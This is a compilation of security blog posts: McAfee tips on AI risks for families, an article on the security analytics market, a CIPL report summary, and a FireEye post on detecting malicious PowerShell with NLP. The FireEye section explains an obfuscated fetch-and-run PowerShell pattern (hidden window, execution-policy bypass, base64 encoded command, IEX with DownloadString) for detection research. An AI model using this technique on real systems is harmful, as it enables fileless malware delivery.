IoT security. With homes becoming “smarter” and equipped with AI-powered IoT products, the opportunity for hackers to get into these devices to steal sensitive data is growing. According to McAfee’s Threat Prediction Report, voice-activated assistants are especially vulnerable as a point-of-entry for hackers. Also at risk, say security experts, are routers, smartphones, and tablets. Tip: Be sure to keep all devices updated. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Security Provider) since they are often less secure. And, be sure to change the default password and secure your primary network and guest network with strong passwords.

The post Artificial Intelligence & Your Family: The Wows & the Risks appeared first on McAfee Blogs.



McAfee Blogs

AI & Your Family: The Wows and Potential Risks

artificial intelligenceAm I the only one? When I hear or see the word Artificial Intelligence (AI), my mind instantly defaults to images from sci-fi movies I’ve seen like I, Robot, Matrix, and Ex Machina. There’s always been a futuristic element — and self-imposed distance — between AI and myself.

But AI is anything but futuristic or distant. AI is here, and it’s now. And, we’re using it in ways we may not even realize.

AI has been woven throughout our lives for years in various expressions of technology. AI is in our homes, workplaces, and our hands every day via our smartphones.

Just a few everyday examples of AI:

  • Cell phones with built-in smart assistants
  • Toys that listen and respond to children
  • Social networks that determine what content you see
  • Social networking apps with fun filters
  • GPS apps that help you get where you need to go
  • Movie apps that predict what show you’d enjoy next
  • Music apps that curate playlists that echo your taste
  • Video games that deploy bots to play against you
  • Advertisers who follow you online with targeted ads
  • Refrigerators that alert you when food is about to expire
  • Home assistants that carry out voice commands
  • Flights you take that operate via an AI autopilot

The Technology

While AI sounds a little intimidating, it’s not when you break it down. AI is technology that can be programmed to accomplish a specific set of goals without assistance. In short, it’s a computer’s ability to be predictive — to process data, evaluate it, and take action.

AI is being implemented in education, business, manufacturing, retail, transportation, and just about any other sector of industry and culture you can imagine. It’s the smarter, faster, more profitable way to accomplish manual tasks.

An there’s tons of AI-generated good going on. Instagram — the #2 most popular social network — is now using AI technology to detect and combat cyberbullying on in both comments and photos.

No doubt, AI is having a significant impact on everyday life and is positioned to transform the future.

Still, there are concerns. The self-driving cars. The robots that malfunction. The potential jobs lost to AI robots.

So, as quickly as this popular new technology is being applied, now is a great time to talk with your family about both the exciting potential of AI and the risks that may come with it.

Talking points for families

Fake videos, images. AI is making it easier for people to face swap within images and videos. A desktop application called FakeApp allows users to seamlessly swap faces and share fake videos and images. This has led to the rise in “deep fake” videos that appear remarkably realistic (many of which go viral). Tip: Talk to your family about the power of AI technology and the responsibility and critical thinking they must exercise as they consume and share online content.

Privacy breaches. Following the Cambridge Analytica/Facebook scandal of 2018 that allegedly used AI technology unethically to collect Facebook user data, we’re reminded of those out to gather our private (and public) information for financial or political gain. Tip: Discuss locking down privacy settings on social networks and encourage your kids to be hyper mindful about the information they share in the public feed. That information includes liking and commenting on other content — all of which AI technology can piece together into a broader digital picture for misuse.

Cybercrime. As outlined in McAfee’s 2019 Threats Prediction Report, AI technology will likely allow hackers more ease to bypass security measures on networks undetected. This can lead to data breaches, malware attacks, ransomware, and other criminal activity. Additionally, AI-generated phishing emails are scamming people into handing over sensitive data. Tip: Bogus emails can be highly personalized and trick intelligent users into clicking malicious links. Discuss the sophistication of the AI-related scams and warn your family to think about every click — even those from friends.

IoT security. With homes becoming “smarter” and equipped with AI-powered IoT products, the opportunity for hackers to get into these devices to steal sensitive data is growing. According to McAfee’s Threat Prediction Report, voice-activated assistants are especially vulnerable as a point-of-entry for hackers. Also at risk, say security experts, are routers, smartphones, and tablets. Tip: Be sure to keep all devices updated. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Security Provider) since they are often less secure. And, be sure to change the default password and secure your primary network and guest network with strong passwords.

The post AI & Your Family: The Wows and Potential Risks appeared first on McAfee Blogs.

Stay Ahead of the Growing Security Analytics Market With These Best Practices

As breach rates climb and threat actors continue to evolve their techniques, many IT security teams are turning to new tools in the fight against corporate cybercrime. The proliferation of internet of things (IoT) devices, network services and other technologies in the enterprise has expanded the attack surface every year and will continue to do so. This evolving landscape is prompting organizations to seek out new ways of defending critical assets and gathering threat intelligence.

The Security Analytics Market Is Poised for Massive Growth

Enter security analytics, which mixes threat intelligence with big data capabilities to help detect, analyze and mitigate targeted attacks and persistent threats from outside actors as well as those already inside corporate walls.

“It’s no longer enough to protect against outside attacks with perimeter-based cybersecurity solutions,” said Hani Mustafa, CEO and co-founder of Jazz Networks. “Cybersecurity tools that blend user behavior analytics (UBA), machine learning and data visibility will help security professionals contextualize data and demystify human behavior, allowing them to predict, prevent and protect against insider threats.”

Security analytics can also provide information about attempted breaches from outside sources. Analytics tools work together with existing network defenses and strategies and offer a deeper view into suspicious activity, which could be missed or overlooked for long periods due to the massive amount of superfluous data collected each day.

Indeed, more security teams are seeing the value of analytics as the market appears poised for massive growth. According to Global Market Insights, the security analytics market was valued at more than $2 billion in 2015, and it is estimated to grow by more than 26 percent over the coming years — exceeding $8 billion by 2023. ABI Research put that figure even higher, estimating that the need for these tools will drive the security analytics market toward a revenue of $12 billion by 2024.

Why Are Security Managers Turning to Analytics?

For most security managers, investment in analytics tools represents a way to fill the need for more real-time, actionable information that plays a role in a layered, robust security strategy. Filtering out important information from the massive amounts of data that enterprises deal with daily is a primary goal for many leaders. Businesses are using these tools for many use cases, including analyzing user behavior, examining network traffic, detecting insider threats, uncovering lost data, and reviewing user roles and permissions.

“There has been a shift in cybersecurity analytics tooling over the past several years,” said Ray McKenzie, founder and managing director of Red Beach Advisors. “Companies initially were fine with weekly or biweekly security log analytics and threat identification. This has morphed to real-time analytics and tooling to support vulnerability awareness.”

Another reason for analytics is to gain better insight into the areas that are most at risk within an IT environment. But in efforts to cull important information from a wide variety of potential threats, these tools also present challenges to the teams using them.

“The technology can also cause alert fatigue,” said Simon Whitburn, global senior vice president, cybersecurity services at Nominet. “Effective analytics tools should have the ability to reduce false positives while analyzing data in real-time to pinpoint and eradicate malicious activity quickly. At the end of the day, the key is having access to actionable threat intelligence.”

Personalization Is Paramount

Obtaining actionable threat intelligence means configuring these tools with your unique business needs in mind.

“There is no ‘plug and play’ solution in the security analytics space,” said Liviu Arsene, senior cybersecurity analyst at Bitdefender. “Instead, the best way forward for organizations is to identify and deploy the analytics tools that best fits an organization’s needs.”

When evaluating security analytics tools, consider the company’s size and the complexity of the challenges the business hopes to address. Organizations that use analytics may need to include features such as deployment models, scope and depth of analysis, forensics, and monitoring, reporting and visualization. Others may have simpler needs with minimal overhead and a smaller focus on forensics and advanced persistent threats (APTs).

“While there is no single analytics tool that works for all organizations, it’s important for organizations to fully understand the features they need for their infrastructure,” said Arsene.

Best Practices for Researching and Deploying Analytics Solutions

Once you have established your organization’s needs and goals for investing in security analytics, there are other important considerations to keep in mind.

Emphasize Employee Training

Chief information security officers (CISOs) and security managers must ensure that their staffs are prepared to use the tools at the outset of deployment. Training employees on how to make sense of information among the noise of alerts is critical.

“Staff need to be trained to understand the results being generated, what is important, what is not and how to respond,” said Steve Tcherchian, CISO at XYPRO Technology Corporation.

Look for Tools That Can Change With the Threat Landscape

Security experts know that criminals are always one step ahead of technology and tools and that the threat landscape is always evolving. It’s essential to invest in tools that can handle relevant data needs now, but also down the line in several years. In other words, the solutions must evolve alongside the techniques and methodologies of threat actors.

“If the security tools an organization uses remain stagnant in their programming and update schedule, more vulnerabilities will be exposed through other approaches,” said Victor Congionti of Proven Data.

Understand That Analytics Is Only a Supplement to Your Team

Analytics tools are by no means a replacement for your security staff. Having analysts who can understand and interpret data is necessary to get the most out of these solutions.

Be Mindful of the Limitations of Security Analytics

Armed with security analytics tools, organizations can benefit from big data capabilities to analyze data and enhance detection with proactive alerts about potential malicious activity. However, analytics tools have their limitations, and enterprises that invest must evaluate and deploy these tools with their unique business needs in mind. The data obtained from analytics requires context, and trained staff need to understand how to make sense of important alerts among the noise.

The post Stay Ahead of the Growing Security Analytics Market With These Best Practices appeared first on Security Intelligence.

CIPL Publishes Report on Artificial Intelligence and Data Protection in Tension

The Centre for Information Policy Leadership (“CIPL”) at Hunton Andrews Kurth LLP recently published the first report in its project on Artificial Intelligence (“AI”) and Data Protection: Delivering Sustainable AI Accountability in Practice.

The report, entitled “Artificial Intelligence and Data Protection in Tension,” aims to describe in clear, understandable terms:

  • what AI is and how it is being used all around us today;
  • the role that personal data plays in the development, deployment and oversight of AI; and
  • the opportunities and challenges presented by AI to data protection laws and norms.

The report describes AI capabilities and examples of public and private uses of AI applications in society. It also looks closely at various tensions that exist between well-established data protection principles and the requirements of AI technologies.

The report concludes with six general observations:

  • Not all AI is the same;
  • AI is widely used in society today and is of significant economic and societal value;
  • AI requires substantial amounts of data to perform optimally;
  • AI requires data to identify and guard against bias;
  • The role of human oversight of AI is likely to and will need to change for AI to deliver the greatest benefit to humankind; and
  • AI challenges some requirements of data protection law.

The report is a level-setting backdrop for the next phase of CIPL’s AI project – working with data protection officials, industry leaders and others to identify practical ways of addressing challenges and harnessing the opportunities presented by AI and data protection.

After this next phase, CIPL expects to release a second report, Delivering Sustainable AI Accountability in Practice, which will address some of the critical tools that companies and organizations are starting to develop and implement to promote accountability for their use of AI within existing legal and ethical frameworks, as well as reasonable interpretations of existing principles and laws that regulators can employ to achieve efficient, effective privacy protection in the AI context. The report will also touch on considerations for the developing data protection laws cognizant of AI and other innovative technologies.

To read the first report in detail and to learn more about the observations detailed above, please see the full report.

Malicious PowerShell Detection via Machine Learning

Introduction

Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.

Background

PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).


Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.


Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).


Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.


Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command unveils a stealthy fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring will download the contents from <url> into a memory buffer (which in turn IEX will execute).

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonym, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm will reduce the word to its original form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.


Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)

The overall NLP pipeline we developed is captured in the following table:

NLP Key Modules

Functionality

Decoder

Detect and decode any encoded text

Named Entity Recognition (NER)

Detect and recognize any entities such as IP, URL, Email, Registry key, etc.

Tokenizer

Tokenize the PowerShell command into a list of tokens

Stemmer

Stem tokens into semantically identical token, uses trie

Vocabulary Vectorizer

Vectorize the list of tokens into machine learning friendly format

Supervised classifier

Binary classification algorithms:

  • Kernel Support Vector Machine
  • Gradient Boosted Trees
  • Deep Neural Networks

Reasoning

The explanation of why the prediction was made. Enables analysts to validate predications.

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model


Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.


Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.

Acknowledgements

We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.